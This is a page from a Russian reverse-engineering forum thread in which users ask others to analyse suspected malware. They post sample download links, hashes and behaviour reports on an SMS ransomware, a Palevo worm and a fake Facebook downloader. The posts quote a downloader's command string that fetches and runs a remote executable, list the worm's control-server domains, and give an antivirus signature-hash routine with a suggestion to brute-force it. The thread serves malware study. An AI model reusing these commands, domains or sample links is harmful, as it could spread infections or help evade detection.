Сейчас на форуме: r0lka, johnniewalker, vsv1, NIKOLA (+4 невидимых)

 eXeL@B —› Крэки, обсуждения —› Запросы на исследование вирусов
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 16 . 17 . >>
Посл.ответ Сообщение

Ранг: 271.5 (наставник), 12thx
Активность: 0.150
Статус: Участник
Packer Reseacher

Создано: 28 октября 2009 16:21 · Поправил: Модератор
· Личное сообщение · #1

Предлагаю тут постить запросы на реверс малвары или файлов в которых вы не уверены.

Формат запроса:
1. Краткое описание задачи, к примеру "Прошу помочь удалить" или "Не пойму почему антивирус называает ...."
2. Аномалии при работе с компом, которые заметили.
3. Ссылка на файл, точная ссылка. К примеру rapidshare. Архив со всем необходимым обязательно должен быть с паролем "virus" (без кавычек).
4. Описание того, что вы уже сделали и какие получили результаты. Рекомендую отказаться от "Вероятно, это...", а лучше "Запустил тулзу... и увидел что...". Вобщем лучше лишний раз проверить, чем писать что вы всего лишь думаете, что это или хотя бы не так открыто, а после каких-нить телодвижений.

-----
My love is very cool girl.




Ранг: 0.2 (гость)
Активность: 0=0
Статус: Участник

Создано: 13 февраля 2010 22:12 · Поправил: bR0tAn2010
· Личное сообщение · #2

1. Разобраться что делает эта зараза
2. Почти не открываются сайты (очень медленно) и соотношение отправлено/получено 3/1), но если отключить и снова включить сетевое соединение 2-3 сайта с нормальной скоростью загружаются.
3. uploading.com/files/c5df6d39/aekwujfk.sys/
4. Также он скрывается в таком же файле, как и Autorun серия вирусов.



Ранг: 23.2 (новичок), 8thx
Активность: 0.020
Статус: Участник

Создано: 14 февраля 2010 00:19
· Личное сообщение · #3

Это atapi.sys из WinXP SP2



Ранг: 87.8 (постоянный), 10thx
Активность: 0.070
Статус: Участник

Создано: 21 февраля 2010 19:39
· Личное сообщение · #4

И мне наконец "повезло" SMS вирус попался, похоже он сильно укрепился, при старте системы на весь экран окно, ничего больше не работает, даже пезезагружать приходится кнопкой, при попытке переустановить систему с СД, вместо появления загрузочного меню- синий экран с собщением типа жесткий диск не найден, похоже он в БИОС залез. Загрузка с СД идет очень долго. Снял диск, на своем компе скопировал весь диск С к себе и отформатировал, сейчас пробуют переустановить систему. Я пока просматриваю скопированное . Нашел один подозрительный файл. Посмотрите пож.
--> Link www.multiupload.com/L9SJFJVTTT<-- На этом диске два раздела при попытке открыть диск D правойклавишей мыши появляется окно выбора прогаммы которой нужно открыть этот файл, при двойном клике мышью появляется содержимое диска, видимо запускается авторан. Вирус скачали с сайта " в контакте" там сказали девчонке что "классная программа". И еще один момент при просмотре диска D в редакторе с адеса 200h до 2000h там ноли а затем идет PE файл, на своих дисках и на диске С содержимое примерно совпадает, я на всякий случай переписал содержимое со всех дисков с начала и до 300h, если понадобится могу выложитью Вопрос к знатокам- при выборе загрузки в БИОСе есть ли обращение к жесткому диску или только к дисководу, ведь как то вирус умудряется получать управление раньше загрузочного диска.

-----
Надежда - есть худшее из зол, ибо она продлевает наши страдания.© Ф. Ницше





Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 21 февраля 2010 20:53
· Личное сообщение · #5

Если в BIOS поставили очередность загрузки: 1) CD 2) HDD, то загрузка с HDD начнется только в 3-х случаях
1) Комп не увидел CD
2) CD передает управление HDD
3) Настройка в BIOS не действует

Последнее возможно, только если настройки не сохраняются или был инжект кода в BIOS.

-----
IZ.RU




Ранг: 87.8 (постоянный), 10thx
Активность: 0.070
Статус: Участник

Создано: 21 февраля 2010 20:59
· Личное сообщение · #6

Все, пошла загрузка после форматирования диска на другом компе.

-----
Надежда - есть худшее из зол, ибо она продлевает наши страдания.© Ф. Ницше





Ранг: 355.4 (мудрец), 55thx
Активность: 0.320
Статус: Uploader
5KRT

Создано: 21 февраля 2010 21:12
· Личное сообщение · #7

DenCoder
инжект кода в BIOS.

Это - фанастика!

-----
Gutta cavat lapidem. Feci, quod potui. Faciant meliora potentes





Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 21 февраля 2010 21:49
· Личное сообщение · #8

Coderess
www.phrack.com/issues.html?issue=66&id=7 разделы 3.2 и 4
и
www.xakep.ru/post/46650/default.asp

Реальность!

-----
IZ.RU




Ранг: 87.8 (постоянный), 10thx
Активность: 0.070
Статус: Участник

Создано: 22 февраля 2010 00:04
· Личное сообщение · #9

Не только у меня не пошла переустановка, мои родственники тоже цепляли недавно, вероятно такой вирус, я потом их распрашивал, парень который им делал переустановку тоже не смог сразу переустановить систему(что меня довольно сильно удивило тогда), во вторых при загруске с диска очень долго думает БИОС, примерно раза в четыре дольше, такое впечатление что управление передается несколько раз между жестким и СД и на заставке этого вируса написано что переустановка системы приведет к потере всех данных. Что то никто по поводу выложенного файла не пишет.

-----
Надежда - есть худшее из зол, ибо она продлевает наши страдания.© Ф. Ницше





Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 22 февраля 2010 00:29
· Личное сообщение · #10

Ссылка нерабочая, попробуйте поправьте.

-----
IZ.RU




Ранг: 23.2 (новичок), 8thx
Активность: 0.020
Статус: Участник

Создано: 22 февраля 2010 00:58
· Личное сообщение · #11

gena-m пишет:
И мне наконец "повезло" SMS вирус попался

FileName: setup.exe
Size: 410 Kb (420352 byte)
Data/Time compile: Fri Jun 19 22:22:17 1992 UTC
MD5: 977421ACF8361FD2825A63920BB894C1
virustotal.com
threatexpert.com
Написан на Delphi, ничем не обработан. Действия стандартные для троянов вымогателей: копирует себя в системную папку, ставит себя в автозагрузку, отключает загрузку в безопасном режиме.
Код для разблокировки 3323456 просто зашит в программу.




Ранг: 17.0 (новичок)
Активность: 0.020
Статус: Участник

Создано: 22 февраля 2010 03:56
· Личное сообщение · #12

кому нибудь попадался такой pornoSMS вирус AdSubscribe.dll покрытый аспротом?



Ранг: 87.8 (постоянный), 10thx
Активность: 0.070
Статус: Участник

Создано: 22 февраля 2010 09:40
· Личное сообщение · #13

Ссылка www.multiupload.com/L9SJFJVTTT
FileName: setup.exe
Size: 410 Kb (420352 byte)

Да это он.

-----
Надежда - есть худшее из зол, ибо она продлевает наши страдания.© Ф. Ницше




Ранг: 23.2 (новичок), 8thx
Активность: 0.020
Статус: Участник

Создано: 22 февраля 2010 13:20
· Личное сообщение · #14

GMax пишет:
FileName: setup.exe
Size: 410 Kb (420352 byte)

Вот и EP_X0FF-у этот троян попался
--> sysinternals.com <--




Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 16 марта 2010 23:45
· Личное сообщение · #15

Только что на почтовый ящик получил письмо следующего содержания:

Dear user of facebook,

Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.

Thanks,
Your Facebook.

с вложением Facebook_password_357.zip, внтури которого файл Facebook_password_357.exe


Адрес отправителя: change@facebook.com

И всё бы хорошо, НО!... я не зарегистрирован на фэйсбуке - это самое главное!

К тому же: зачем восстановленный пароль прятать в исполняемый файл, упакованный UPX v3.0 с изменённой с помощью программы restorator иконкой от ворда?

Файл уже отправлен в лабораторию Касперского.


Файло в аттаче, пароль стандартный.

0eba_16.03.2010_CRACKLAB.rU.tgz - Facebook_password_357.rar

-----
Do Not Get Mad Get Money! ;)





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 17 марта 2010 02:29 · Поправил: Flint
· Личное сообщение · #16

Talula
Это даунлоадер отстукивает сюда
funnylive2010.ru/ms/bb.php?v=200&id=979875378&b=16marta&tm=39

Получает команду
Code:
  1. [info]runurl:http://voluntariospr.com/includes/phpmailer/feed.exe|task    id:6|delay:45|upd:0|backurls:http://starsico.ru/ms/bb.php;http://mista rsico.ru/ms/bb.php;http://lavstarsico.ru/ms/bb.php;http://briostarsico .ru/ms/bb.php;[/info]


Затем скачивает и устанавливает псевдоантивирус --> Windows Defender 2010 <--

Лол в "антивирусе" даже лицензионный ключик есть 1145-17884799-7733

-----
Nulla aetas ad discendum sera




Ранг: 11.1 (новичок)
Активность: 0.010
Статус: Участник

Создано: 17 марта 2010 10:41 · Поправил: Twister
· Личное сообщение · #17

Facebook_password:

Файл скорее всего пожат UPX более ранних версий, нежели 3, ибо 3.04 распаковывать его отказалась. А может автор заюзал скрамблер, не суть важно. В распакованном виде весит вдвое больше.

EXE частично покриптован, имеется какая-то примитивная антиотладка. Расшифровщик пишет прямо в секцию кода, делая ее предварительно доступной на запись. То ли код был подвержен морфингу, то ли автору не влом было на каждую инструкцию придумывать по пять эквивалентных.

Там же в секции кода содержится dll, которая изрыгается в темповую директорию с именем <n>.tmp, где <n> - последовательные числа. У меня нумерация началась с 8-ки, скорее всего гуано считает кол-во имеющихся файлов с расширением .tmp. Оригинальное имя длл - intro.dll.

Dll импортирует только LoadLibrary и GetProcAddress, имеет четыре экспортируемых функции с бессмысленными именами. Очень уж хотел автор этой поделки сокрыть полезную нагрузку

Потом пришло время обеда и голод пересилил желание исследовать дальше. Тем более я уверен, что ничего особо интересного тут все равно не будет. Если кто желает продолжить, то пожалуйста, выкладываю dll. Пароль стандартный.

хttp://slil.ru/28808387

ЗЫ. Идея топика очень по душе



Ранг: 512.7 (!), 360thx
Активность: 0.270.03
Статус: Модератор

Создано: 20 марта 2010 13:38
· Личное сообщение · #18

какой-то упрямец (заразился через флешку - авторанс)
не смог удалить файл даже в сейф моде (хиренс помог)
пишет 2а ключа в реестр (автозапуск)
блокирует свое удаление как файл
неужели там драйвер?
вирустотал - почти молчит (2а суспектед, ничего конкретного)

кому интересно поглазеть -
multi-up.com/240388



Ранг: 23.2 (новичок), 8thx
Активность: 0.020
Статус: Участник

Создано: 21 марта 2010 13:29
· Личное сообщение · #19

sendersu пишет:
кому интересно поглазеть -
multi-up.com/240388


P2P-Worm.Win32.Palevo.ann
Запакован UPX, распакованный:
FileName: csrss.exe
Size: 209 Kb (214016 byte)
Data/Time compile: Tue May 22 12:55:29 2007 UTC
MD5: 39C87B2EE68EE96FBECED5B2A73A5DC5
www.virustotal.com/ru/analisis/860a1d9eeba0ef47475ae28b3ad7228ceb9dec518f41a832616d4b10000ddd9b-1269105712
www.threatexpert.com/report.aspx?md5=39c87b2ee68ee96fbeced5b2a73a5dc5
Код содержит большое количество фейк кода с множеством вызовов различных API. Имеется антиотладка -- SEH + деление на ноль. В выделенной памяти загрузчик расшифровывает (в два прохода) в выделяемую память исполняемый файл, настраивает его и переходит на EP.
Size: 113 Kb (115740 byte)
Data/Time compile: Sat Feb 27 13:27:54 2010 UTC
MD5: A5B6AABF7AFA742E3FFC5C7B4E26D9D7
www.virustotal.com/ru/analisis/e8621553d1597252b2cec354af7b5665410e2df8c8ad06880e429df4e25cd9d1-1269165939
Инициализирует импорт, мапит себя и импорт в процесс explorer.exe и создает удаленный поток. Поток в эксплорере проверяет мютекс “aljsughu55”, затем копирует себя в "C:\Documents and Settings\Admin\csrss.exe" и открывает его, что блокирует операции с файлом. Далее загружает необходимые библиотеки. Прописывает себя в автозагрузку “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman”.
Создает пайп \.\pipe\iuuualj55, через него идет управление ботом. Создает окно с классом “noaljclass”, для копирования себя на USB носители.

Выполняет функцию InternetOpen с агентом "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)". В бот зашиты следующие командные центры:
sandra.prichaonica.com

pica.banjalucke-ljepotice.ru

l33t.brand-clothes.net


Вот тут исследования того же семпла -- www.kernelmode.info/forum/viewtopic.php?f=16&t=70



Ранг: 512.7 (!), 360thx
Активность: 0.270.03
Статус: Модератор

Создано: 21 марта 2010 20:30
· Личное сообщение · #20

GMax
спасибо!
оказиваеться я захостил у себя бота на пару часов )))
самое интересное что ета ботина и в сейф моде работает! а заразился через флешку, как ето банально не звучит...... прям ера ДОСа с дискетами но по=новому

кста, простой smart whois сервис показал что:

1) l33t.brand-clothes.net (91.211.117.111)
91.211.116.0 - 91.211.119.255
Zharkov Mukola Mukolayovuch
Zharkov Nikolay
Ukraine, Kyiv, Entuziastov str. 29, of. 42
+38-044 587-83-16

2) pica.banjalucke-ljepotice.ru (91.211.117.111)
91.211.116.0 - 91.211.119.255
Zharkov Mukola Mukolayovuch
Zharkov Nikolay
Ukraine, Kyiv, Entuziastov str. 29, of. 42
+38-044 587-83-16

3) sandra.prichaonica.com (91.211.117.111)
91.211.116.0 - 91.211.119.255
Zharkov Mukola Mukolayovuch
Zharkov Nikolay
Ukraine, Kyiv, Entuziastov str. 29, of. 42
+38-044 587-83-16



Ранг: 4.4 (гость)
Активность: 0.010
Статус: Участник

Создано: 01 апреля 2010 22:17
· Личное сообщение · #21

Здравствуйте!
Помогите с такой задачей. Нужно определить, есть в этом exe вирусня или нет.
Вирустотал показывает вот:
www.virustotal.com/ru/analisis/fa27d81e1590af99b4293e5416c8d6e499bf17362ae7bbd8dd7ba5bc0d42fcab-1270147957

Чел, который проводил манипуляции с этим exe уверяет, что бояться нечего и файл чист. Типа лже-срабатывания...
Помогите разобраться, пожалуйста. Есть там вирус или нет. Если есть, в чём его задача....
Заранее благодарю.

Вот сам файл: link_deleted_by_forum_engine/files/cpdzff7qo
Пароль на архив: 123




Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 01 апреля 2010 23:39
· Личное сообщение · #22

antiMOCT, похоже именно на ложные срабатывния. погляди какие авиры увидели в нём заразу и посмотри чем упакован файл.

-----
Do Not Get Mad Get Money! ;)




Ранг: 4.4 (гость)
Активность: 0.010
Статус: Участник

Создано: 02 апреля 2010 00:24
· Личное сообщение · #23

Talula

Понимаете в чём заковыка...
Есть 2 таких экзешника. В одном менялись ресурсы (это тот, который я прошу проверить), и второй, в котором не менялись ресурсы, но упакованы они одним и тем же пакером PKLITE32.
Вот скрины проверки второго экзе
www.virustotal.com/ru/analisis/567a65d6b5c96242ed4b65b0881ace0dd17913fa51a6f6ec0a01cb9d1fb319ed-1270147774

Тут видно, что орут пару антивирей на пакер. А на первый целый хор взъелся...
Я распаковал подозрительный экзешник. Но каспер по прежнему видит в нём Backdoor.Win32.SdBot.rfm
Может туда вместе с заменой ресурсов ещё и какую приблуду засунули?



Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

Создано: 02 апреля 2010 00:38
· Личное сообщение · #24

antiMOCT Не качал больно много. Может там просто тупо воткнута какая-нибудь вирусная сигнатура?



Ранг: 4.4 (гость)
Активность: 0.010
Статус: Участник

Создано: 02 апреля 2010 01:28
· Личное сообщение · #25

NikolayD
NikolayD пишет:
Не качал больно много. Может там просто тупо воткнута какая-нибудь вирусная сигнатура?


Если б я знал, я б не спрашивал




Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 02 апреля 2010 01:34
· Личное сообщение · #26

Это здесь не при чем! У файла подсчитываются размер, CRC32, MD5-хеш, SHA1-хеш... Вот это и есть сигнатуры.

-----
IZ.RU




Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

Создано: 02 апреля 2010 02:12 · Поправил: NikolayD
· Личное сообщение · #27

DenCoder С чего бы это вдруг её что невозможно поменять? Почему нет?




Ранг: 324.3 (мудрец), 221thx
Активность: 0.480.37
Статус: Участник

Создано: 02 апреля 2010 02:55
· Личное сообщение · #28

А, имеешь ввиду типа "Ijeefo!Esbhpo!Wjsvt" по смещению 0x610, что означает "Hidden Dragon Virus" ? Может быть, конечно...

-----
IZ.RU




Ранг: 255.8 (наставник), 19thx
Активность: 0.150.01
Статус: Участник
vx

Создано: 02 апреля 2010 04:54
· Личное сообщение · #29

У веба определена сигнатура для Win32.Sdbot:
CureIt 6.00.1.03150
Идентификатор имени и типа: 0x386F465B
Первый опкод сигнатуры: 0x68
Размер сигнатуры: 16 байт.
Хэш сигнатуры: 0x11793745
Вычисляется ксорами:
Code:
  1. ; Esi: @Code
  2. ; cl: SIGNATURE.CodeLength
  3. ;
  4.          xor edi,edi
  5.          xor eax,eax
  6.          mov edx,eax
  7. @@:
  8.          xor dh,dl
  9.          xor dl,ah
  10.          xor ah,al
  11.          mov al,byte ptr ds:[edi + esi]
  12.          inc edi
  13.          xor al,dh
  14.          dec cl
  15.          jne @b
  16.          shl edx,16
  17.          lea eax,[edx +  eax]

Кому не лень, могут сбрутфорсить, ну или обращик виря найти и вытянуть код для сигнатуры.




Ранг: 147.7 (ветеран), 50thx
Активность: 0.120
Статус: Участник
sv_cheats 1

Создано: 30 апреля 2010 20:30 · Поправил: SER[G]ANT
· Личное сообщение · #30

Вообщем, все как обычно, сижу в интернете, лазию по всяким башам/хабрам/смотрю порно, потом перезагружаю комп и о чудо, мне впервые в жизни попался SMS!
http://img265.imageshack.us/img265/6434/123nef.jpg (осторжно, сисьге!:s6
Проживает в C:\Users\Banner.exe вместе с файлов time.txt, к себе в гости приглашает firefox.exe и сидят они там, соображают на троих. А чтобы я сиськи видел чаще, прописывает себя (Banner.exe) в автозагрузку, причем без всяких ухищрений.
Не званного гостя я выгнал, потом на всякий случай прошелся свежескаченным CureIt'ом, который ничего не нашел.
Но вот беда, после каждой загрузки системы я вижу "Квадрат Малевича" и курсор мыши. И приходится жмакать Ctrl+Alt+Delete и перезапускать explorer.exe. Видать он еще и нагадил в реестре, но где, не знаю.
Систему переустанавливать ой как не охото, т.к. проще написать и засунуть в автозапуск программку, убивающую и запускающую explorer.exe заново.
Может кто сталкивался с ним и знает как полностью избавится от последствий его прибывания ?
И да... про http://support.kaspersky.ru/viruses/deblocker вспомнил только после того как убил этот SMS, хотя не факт что все бы вернулось на место.




Ранг: 681.5 (! !), 405thx
Активность: 0.420.21
Статус: Участник
ALIEN Hack Team

Создано: 30 апреля 2010 20:38 · Поправил: ARCHANGEL
· Личное сообщение · #31

SER[G]ANT

Не совсем ясно - так explorer ты просто запускаешь, или TerminateProcess в Task Manager, а только потом запуск? Дело в том, что explorer службы не запускает - services.exe и только он запускает службы.

-----
Stuck to the plan, always think that we would stand up, never ran.



<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . 9 . 10 ... 16 . 17 . >>
 eXeL@B —› Крэки, обсуждения —› Запросы на исследование вирусов
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати